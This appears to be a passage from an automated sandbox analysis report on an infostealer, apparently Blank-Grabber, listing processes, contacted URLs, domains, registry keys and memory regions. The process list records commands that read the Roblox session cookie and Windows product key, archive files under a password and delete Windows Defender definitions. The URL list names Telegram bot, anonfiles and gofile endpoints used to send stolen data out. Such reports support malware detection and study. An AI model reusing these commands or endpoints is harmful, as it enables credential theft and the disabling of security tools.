AG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
malicious
C:\Windows\System32\getmac.exe
getmac
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
malicious
C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
malicious
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 76 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://duckduckgo.com/chrome_newtab
unknown
https://github.com/Blank-c/BlankOBF
unknown
https://www.avito.ru/
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org/bot
unknown
http://crl.microsoft
unknown
https://www.ctrip.com/
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
https://www.leboncoin.fr/
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
unknown
https://github.com/urllib3/urllib3/issues/2920px
unknown
https://weibo.com/
unknown
https://api.anonfiles.com/upload
unknown
https://www.msn.com
unknown
http://www.microsoftILEEX~1.LNKy./
unknown
https://nuget.org/nuget.exe
unknown
https://discord.com/api/v9/users/
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
http://cacerts.digi
unknown
http://www.microsoftISPLA~1.PNGy.
unknown
https://peps.python.org/pep-0205/
unknown
https://www.reddit.com/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.amazon.ca/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
https://www.ebay.co.uk/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://www.ebay.de/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://www.amazon.com/
unknown
https://github.com/python/cpython/issues/86361.
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://httpbin.org/
unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://www.youtube.com/
unknown
https://allegro.pl/
unknown
https://github.com/Pester/Pester
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
http://www.microsoftRUSTT~2JSOy./
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
https://MD8.mozilla.org/1/m
unknown
https://www.python.org/psf/license/
unknown
https://www.bbc.co.uk/
unknown
http://ip-api.com/line/?fields=hostingr
unknown
https://bugzilla.mo
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
unknown
https://google.com/mail
unknown
https://www.python.org/psf/license/)
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
https://www.google.com/
unknown
https://www.iqiyi.com/
unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
http://google.com/
unknown
http://ocsp.sectigo.com0
unknown
https://tools.ietf.org/html/rfc7231#section-4.3.6)
unknown
https://www.python.org/download/releases/2.3/mro/.
unknown
https://contoso.com/License
unknown
https://discordapp.com/api/v9/users/
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://github.com/urllib3/urllib3/issues/2920
unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
unknown
https://yahoo.com/
unknown
https://www.mozilla.oL
unknown
https://account.bellmedia.c
unknown
http://ocsp.sectigo
unknown
http://crl.0
unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
unknown
https://login.microsoftonline.com
unknown
https://go.micros
unknown
http://cacerts.digicert.co
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://html.spec.whatwg.org/multipage/
unknown
https://www.ifeng.com/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
unknown
https://www.zhihu.com/
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://oneget.orgX
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0
unknown
https://api.gofile.io/getServer
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://sectigo.com/CPS0
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
https://www.amazon.co.uk/
unknown
http://ocsp.thawte.com0
unknown
https://json.org
unknown
https://api.telegram.org/bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument
149.154.167.220
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.telegram.org
149.154.167.220
malicious
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
208.95.112.1
ip-api.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
1280x1024x32(BGR 0)
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4387
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4407

Memdumps

Base Address
Regiontype
Protect
Malicious
28C87B86000
heap
page read and write
malicious
28C87B63000
heap
page read and write
malicious
1CCD86C8000
heap
page read and write
malicious
28C87D18000
heap
page read and write
malicious
28C87930000
direct allocation
page read and write
malicious
28C87B77000
heap
page read and write
malicious
1CCD86C6000
heap
page read and write
malicious
28C88DA0000
heap
page read and write
malicious
28C87B85000
heap
page read and write
malicious
28C87B76000
heap
page read and write
malicious
28C87D95000
heap
page read and write
28C873C5000
heap
page read and write
1BC8A8B7000
heap
page read and write
28C877E5000
heap
page read and write
1E1A0647000
heap
page read and write
18D018C1000
heap
page read and write
38F00FF000
unkown
page read and write
1E1A0654000
heap
page read and write
28E2CE39000
heap
page read and write
28C87D12000
heap
page read and write
28C87DAA000
heap
page read and write
1E1A0034000
heap
page read and write
1BC8A8C6000
heap
page read and write
28C87800000
heap
page read and write
1CCD86D0000
heap
page read and write
28C87E70000
direct allocation
page read and write
17342283000
heap
page read and write
1CCD86D1000
heap
page read and write
28C87D8B000
heap
page read and write
28E2D482000
heap
page read and write
1733EFCE000
heap
page read and write
28C88B51000
heap
page read and write
1AC9F685000
heap
page read and write
21D4D9D0000
heap
page read and write
1436F9BD000
heap
page read and write
28C877A5000
heap
page read and write
1733EF7A000
heap
page read and write
266C3ED0000
heap
page read and write
7FF8479B0000
trusted library allocation
page read and write
28FE1241000
heap
page read and write
7FF847980000
trusted library allocation
page read and write
28C872E0000
heap
page read and write
15373790000
heap
page read and write
1436D9E1000
heap
page read and write
8FA43FF000
stack
page read and write
23315587000
heap
page read and write
28C88CDD000
heap
page read and write
28C88832000
heap
page read and write
28C88278000
direct allocation
page read and write
28C8732E000
heap
page read and write
1CCD86D1000
heap
page read and write
28C88B90000
heap
page read and write
288218E000
stack
page read and write
28C87D6C000
heap
page read and write
1CCD86C4000
heap
page read and write
28C877C9000
heap
page read and write
14B35500000
heap
page read and write
1E19FFCA000
heap
page read and write
1733EFCE000
heap
page read and write
D6C9B9B000
stack
page read and write
28C88A0A000
heap
page read and write
28C87C2C000
heap
page read and write
20D5DE10000
heap
page read and write
28C8771F000
heap
page read and write
241A8835000
heap
page read and write
28C87D8A000
heap
page read and write
28E2CFB5000
heap
page read and write
7FF8B8F94000
unkown
page execute and read and write
1537161B000
heap
page read and write
1618354F000
trusted library allocation
page read and write
1CCD86C4000
heap
page read and write
9CB01FF000
unkown
page read and write
28C87333000
heap
page read and write
28C87C77000
heap
page read and write
153716B0000
heap
page read and write
28C87C20000
heap
page read and write
1436E11C000
heap
page read and write
7FF73AE10000
unkown
page readonly
28C87D91000
heap
page read and write
1619A222000
heap
page read and write
25CAEB40000
heap
page read and write
1BC8A893000
heap
page read and write
1436E100000
heap
page read and write
18EBB804000
heap
page read and write
1F23A8A0000
heap
page read and write
1CCD86C4000
heap
page read and write
18EBB0A7000
heap
page read and write
1E1A0660000
heap
page read and write
28E2ED11000
heap
page read and write
28E2CE45000
heap
page read and write
28E2CE4C000
heap
page read and write
28C876DF000
heap
page read and write
16180130000
heap
page read and write
14B35A9E000
heap
page read and write
15373785000
heap
page read and write
7FF8479F0000
trusted library allocation
page read and write
28C87C68000
heap
page read and write
2BAD9A00000
heap
page read and write
1F23A740000
heap
page read and write
7FF847990000
trusted library allocation
page read and write
28C8876F000
heap
page read and write
1733EF51000
heap
page read and write
16183190000
trusted library allocation
page read and write
1BC8A89E000
heap
page read and write
28C87336000
heap
page read and write
1E19FFC4000
heap
page read and write
28E2CFED000
heap
page read and write
2720DB31000
heap
page read and write
25CAEB58000
heap
page read and write
7FF7F7F2E000
unkown
page readonly
1EE13770000
heap
page read and write
1E1A0669000
heap
page read and write
1CCD86C4000
heap
page read and write
1436E135000
heap
page read and write
173422B2000
heap
page read and write
28B63517000
heap
page read and write
15300001000
trusted library allocation
page read and write
1733EEF5000
heap
page read and write
7FF8479C0000
trusted library allocation
page read and write
1AC9F698000
heap
page read and write
7FF8A9393000
unkown
page execute and read and write
173422B8000
heap
page read and write
14B35ABA000
heap
page read and write
16183183000
trusted library allocation
page read and write
28B63300000
heap
page read and write
2BAD99E0000
heap
page read and write
28C87D37000
heap
page read and write
1E1A0052000
heap
page read and write
1CCD86C4000
heap
page read and write
28C87352000
heap
page read and write
1436F9BD000
heap
page read and write
28C88AAD000
heap
page read and write
1CCD86D1000
heap
page read and write
246E4F70000
heap
page read and write
18D018AA000
heap
page read and write
1436DA07000
heap
page read and write
1CCD86C4000
heap
page read and write
28E2CE3D000
heap
page read and write
2880DCF000
stack
page read and write
28C88B49000
heap
page read and write
1436D9FC000
heap
page read and write
2881379000
stack
page read and write
28E2CEC4000
heap
page read and write
28C88A35000
heap
page read and write
28C87B5F000
heap
page read and write
95867FF000
unkown
page read and write
28C8879D000
heap
page read and write
28C88B51000
heap
page read and write
28C87C2E000
heap
page read and write
28C88B5F000
heap
page read and write
28B63325000
heap
page read and write
27258AF0000
heap
page read and write
28C87D8E000
heap
page read and write
28E2CE76000
heap
page read and write
28C88B85000
heap
page read and write
1734229A000
heap
page read and write
28E2CEBC000
heap
page read and write
2545B480000
heap
page read and write
14B353D0000
heap
page read and write
28C87D78000
heap
page read and write
14B35512000
heap
page read and write
28C87CD7000
heap
page read and write
28C876B9000
heap
page read and write
7FF8A883A000
unkown
page execute and read and write
182DF820000
heap
page read and write
1E1A0052000
heap
page read and write
14B35512000
heap
page read and write
1E1A0032000
heap
page read and write
28E2CE19000
heap
page read and write
1BD20130000
heap
page read and write
B51377B000
stack
page read and write
173422D4000
heap
page read and write
28FE1237000
heap
page read and write
D0F7BFF000
stack
page read and write
1436D9E7000
heap
page read and write
7FF8B8CBE000
unkown
page execute and read and write
1733EF13000
heap
page read and write
28C87339000
heap
page read and write
1436D9E3000
heap
page read and write
1F23C1D0000
direct allocation
page read and write
18A64C21000
heap
page read and write
7FF7F7F26000
unkown
page read and write
28C88906000
heap
page read and write
28C87B06000
heap
page read and write
1F23A7C9000
heap
page read and write
28E2CFBA000
heap
page read and write
28C87B77000
heap
page read and write
173422EC000
heap
page read and write
7DF4C2E00000
trusted library allocation
page execute and read and write
28C88794000
heap
page read and write
1436E133000
heap
page read and write
18EBB7F0000
heap
page read and write
7FF8A8D65000
unkown
page execute and read and write
1F23A74A000
heap
page read and write
28E2CEAA000
heap
page read and write
28C87DD0000
heap
page read and write
182DF960000
heap
page read and write
28C87D95000
heap
page read and write
1733EED8000
heap
page read and write
20D5E070000
heap
page read and write
28C88AF5000
heap
page read and write
1EE13965000
heap
page read and write
266C4080000
heap
page read and write
28C8767A000
heap
page read and write
28E2D49F000
heap
page read and write
28C88A28000
heap
page read and write
1F23DD3D000
direct allocation
page read and write
98A0BFF000
stack
page read and write
1E1A0672000
heap
page read and write
28C88B85000
heap
page read and write
28C87CC8000
heap
page read and write
28C8766D000
heap
page read and write
1A96E3A0000
heap
page read and write
1E1A0046000
heap
page read and write
28C8774D000
heap
page read and write
234DABA0000
heap
page read and write
1EE628C0000
heap
page read and write
28E2CFEE000
heap
page read and write
28C87D8B000
heap
page read and write
1436D9E7000
heap
page read and write
15373780000
heap
page read and write
32E138B000
stack
page read and write
28C87DA2000
heap
page read and write
12F9F68000
stack
page read and write
6768A7F000
stack
page read and write
28C88BB5000
heap
page read and write
28C88B49000
heap
page read and write
1E19FFCE000
heap
page read and write
28C88294000
direct allocation
page read and write
7FF84769D000
trusted library allocation
page execute and read and write
7FF8B9092000
unkown
page execute and write copy
1734222C000
heap
page read and write
28C88640000
direct allocation
page read and write
28C87DA8000
heap
page read and write
7FF8479E0000
trusted library allocation
page read and write
2720DB21000
heap
page read and write
28C87CB0000
heap
page read and write
28C87CB8000
heap
page read and write
1EE13670000
heap
page read and write
234DABC0000
heap
page read and write
18EBD0B6000
heap
page read and write
28C89910000
direct allocation
page read and write
1436F9C4000
heap
page read and write
14B35529000
heap
page read and write
1F23DBB0000
direct allocation
page read and write
1CCD86C4000
heap
page read and write
28E2ED24000
heap
page read and write
28C876A9000
heap
page read and write
7FF8478F0000
trusted library allocation
page read and write
2D0F8FF000
stack
page read and write
28C87D1F000
heap
page read and write
28C87703000
heap
page read and write
2545B320000
heap
page read and write
1A6A1420000
heap
page read and write
2238CFC0000
heap
page read and write
1BC8A89E000
heap
page read and write
1733EFBF000
heap
page read and write
1733EF18000
heap
page read and write
16180320000
heap
page read and write
28C87DF0000
heap
page read and write
1436DA07000
heap
page read and write
27258A00000
heap
page read and write
1429BA3B000
heap
page read and write
153714A0000
heap
page read and write
1436DA03000
heap
page read and write
7FF8476BB000
trusted library allocation
page read and write
28C8873B000
heap
page read and write
1436DBF5000
heap
page read and write
1CCD86D1000
heap
page read and write
28B6330D000
heap
page read and write
15372FA0000
trusted library allocation
page read and write
ED9D5FF000
stack
page read and write
1C7FBA61000
heap
page read and write
14B35510000
heap
page read and write
18EBB80F000
heap
page read and write
1E1A0046000
heap
page read and write
1B839AE0000
heap
page read and write
288127A000
stack
page read and write
28C8878F000
heap
page read and write
173422B2000
heap
page read and write
20D5DEAD000
heap
page read and write
257A33C5000
heap
page read and write
20D5DEC6000
heap
page read and write
28C88794000
heap
page read and write
28C87C2E000
heap
page read and write
28C873C5000
heap
page read and write
7FF847910000
trusted library allocation
page read and write
28C87DA6000
heap
page read and write
14B354F9000
heap
page read and write
28C88B34000
heap
page read and write
14B37323000
heap
page read and write
28E2CE65000
heap
page read and write
18EBB0FC000
heap
page read and write
14B35A95000
heap
page read and write
28C87B74000
heap
page read and write
28C88738000
heap
page read and write
28C87803000
heap
page read and write
28C88A0B000
heap
page read and write
18EBB6AE000
heap
page read and write
14B35A8C000
heap
page read and write
28C87D5B000
heap
page read and write
28C87683000
heap
page read and write
6765FF000
stack
page read and write
1E1A0648000
heap
page read and write
28C88747000
heap
page read and write
28C87C2E000
heap
page read and write
7FF8B93C1000
unkown
page execute and read and write
28C88754000
heap
page read and write
28C87CA8000
heap
page read and write
28C87D18000
heap
page read and write
2720DB1A000
heap
page read and write
18D018C1000
heap
page read and write
1436D9E1000
heap
page read and write
7FF847A00000
trusted library allocation
page read and write
32C71DF000
stack
page read and write
28C88A15000
heap
page read and write
1A6A1340000
heap
page read and write
27258920000
heap
page read and write
28C88B2F000
heap
page read and write
28C87DCA000
heap
page read and write
2545B3A1000
heap
page read and write
28C8737A000
heap
page read and write
28C87CC8000
heap
page read and write
1E1A0032000
heap
page read and write
161832D0000
trusted library allocation
page read and write
17341164000
heap
page read and write
18EBB7F7000
heap
page read and write
28C87C68000
heap
page read and write
28C87333000
heap
page read and write
14B35AAC000
heap
page read and write
1CCD86D1000
heap
page read and write
2BAD9A90000
heap
page read and write
1A6A14D0000
heap
page read and write
1733EFBF000
heap
page read and write
28C88680000
direct allocation
page read and write
14B35440000
trusted library allocation
page read and write
7FF8A81A8000
unkown
page execute and write copy
7FF847A00000
trusted library allocation
page read and write
1BD201F1000
heap
page read and write
7FF7F7F28000
unkown
page readonly
16183AA9000
trusted library allocation
page read and write
14B35515000
heap
page read and write
51AD8FE000
stack
page read and write
23315755000
heap
page read and write
17342283000
heap
page read and write
28C88670000
direct allocation
page read and write
7FF7F7F2E000
unkown
page readonly
28C87800000
heap
page read and write
28C876DA000
heap
page read and write
7FF73AE4E000
unkown
page read and write
1E1A0037000
heap
page read and write
28C88796000
heap
page read and write
14B3732E000
heap
page read and write
266C3EBA000
heap
page read and write
28C88842000
heap
page read and write
28C87365000
heap
page read and write
1F23DCA2000
direct allocation
page read and write
1733EEFA000
heap
page read and write
18A64C21000
heap
page read and write
28C87B54000
heap
page read and write
28C88794000
heap
page read and write
1733EFCE000
heap
page read and write
28C87DAA000
heap
page read and write
28B63510000
heap
page read and write
1F23A75C000
heap
page read and write
28C8732E000
heap
page read and write
28E2CFB7000
heap
page read and write
1E1A0032000
heap
page read and write
28C87DCA000
heap
page read and write
22AE1395000
heap
page read and write
28E2ED26000
heap
page read and write
17342270000
heap
page read and write
12FA2FF000
stack
page read and write
28C87322000
heap
page read and write
7FF8476A3000
trusted library allocation
page execute and read and write
28C88DAD000
heap
page read and write
1F23C190000
direct allocation
page read and write
1436DA29000
heap
page read and write
15372F10000
heap
page execute and read and write
26243020000
heap
page read and write
1F23DCF0000
direct allocation
page read and write
246E5295000
heap
page read and write
28E2EEC0000
heap
page read and write
1CCD86C4000
heap
page read and write
21AD4795000
heap
page read and write
1619A0E0000
heap
page execute and read and write
28B63210000
heap
page read and write
1CCD86C4000
heap
page read and write
28E2D4A2000
heap
page read and write
28E2CE41000
heap
page read and write
28C858E0000
heap
page read and write
28FE11C0000
heap
page read and write
7FF7F7F08000
unkown
page write copy
28C88741000
heap
page read and write
28C88DEB000
heap
page read and write
1BC8A8BA000
heap
page read and write
28C877D1000
heap
page read and write
28C87352000
heap
page read and write
1436D9F0000
heap
page read and write
B513BFE000
stack
page read and write
28C87DCA000
heap
page read and write
7FF8B9071000
unkown
page execute and read and write
1EE13691000
heap
page read and write
1436DA2C000
heap
page read and write
28C87C67000
heap
page read and write
1E1A004D000
heap
page read and write
18D01805000
heap
page read and write
28E2D49C000
heap
page read and write
18EBB6A7000
heap
page read and write
14B352F0000
heap
page read and write
1F23C200000
heap
page read and write
1436E11C000
heap
page read and write
161835D3000
trusted library allocation
page read and write
28C87CB8000
heap
page read and write
153735AC000
heap
page read and write
28C8732E000
heap
page read and write
257A314C000
heap
page read and write
28C87C76000
heap
page read and write
7FF8A884F000
unkown
page execute and read and write
28C87C24000
heap
page read and write
2881538000
stack
page read and write
28B63411000
heap
page read and write
1F23A924000
heap
page read and write
54EBE7F000
stack
page read and write
161829C2000
trusted library allocation
page read and write
1AC9F6AF000
heap
page read and write
14B37325000
heap
page read and write
28C87D1C000
heap
page read and write
28C88B51000
heap
page read and write
28C87DAA000
heap
page read and write
28C88B7D000
heap
page read and write
16180270000
heap
page read and write
28C876A9000
heap
page read and write
28E2CE5D000
heap
page read and write
26243220000
heap
page read and write
28C88B73000
heap
page read and write
1C7FBA58000
heap
page read and write
1CCD86C4000
heap
page read and write
18EBB0FF000
heap
page read and write
14B35430000
heap
page read and write
14B35512000
heap
page read and write
21D4D920000
heap
page read and write
28C87D68000
heap
page read and write
257A3152000
heap
page read and write
28C87CA0000
heap
page read and write
21AD4641000
heap
page read and write
28C876A9000
heap
page read and write
7FF847950000
trusted library allocation
page read and write
4B4CE8F000
stack
page read and write
28C877BA000
heap
page read and write
1A96E460000
heap
page read and write
28C873A4000
heap
page read and write
B513B7E000
stack
page read and write
1436D9F8000
heap
page read and write
28E2CDA0000
heap
page read and write
28C88650000
direct allocation
page read and write
14B35500000
heap
page read and write
20C0AC72000
heap
page read and write
28C88168000
direct allocation
page read and write
1BC8A8B7000
heap
page read and write
14B35A9E000
heap
page read and write
28C87B27000
heap
page read and write
1F23DCD0000
direct allocation
page read and write
1F23A7C8000
heap
page read and write
1619A462000
heap
page read and write
1733EF51000
heap
page read and write
7FF8B906A000
unkown
page execute and write copy
16183187000
trusted library allocation
page read and write
28FE1239000
heap
page read and write
28E2CEB5000
heap
page read and write
1CCD86C4000
heap
page read and write
18EBB105000
heap
page read and write
28C8782E000
heap
page read and write
153102FE000
trusted library allocation
page read and write
1F23A860000
direct allocation
page read and write
7FF847950000
trusted library allocation
page read and write
7FF8479E0000
trusted library allocation
page read and write
1E1A1EF6000
heap
page read and write
28C88A6C000
heap
page read and write
161801BB000
heap
page read and write
1E1A0675000
heap
page read and write
28E2D47F000
heap
page read and write
14B354C8000
heap
page read and write
28C87DEF000
heap
page read and write
246E4F60000
heap
page read and write
1734229A000
heap
page read and write
173421C0000
heap
page read and write
28C877CE000
heap
page read and write
28C87D28000
heap
page read and write
DFF4E7F000
stack
page read and write
18EBB0F4000
heap
page read and write
28C886B0000
direct allocation
page read and write
7FF8A8F28000
unkown
page execute and write copy
17342283000
heap
page read and write
7FF847872000
trusted library allocation
page read and write
28C887A5000
heap
page read and write
28E2CFBA000
heap
page read and write
18D017D0000
heap
page read and write
40867E000
stack
page read and write
14B3732E000
heap
page read and write
1F23A77C000
heap
page read and write
14B35AA9000
heap
page read and write
28C88FC0000
direct allocation
page read and write
7FF847694000
trusted library allocation
page read and write
28C88B8F000
heap
page read and write
28C88A19000
heap
page read and write
1BD201E9000
heap
page read and write
17342AD9000
heap
page read and write
28C88AED000
heap
page read and write
28C88FF0000
heap
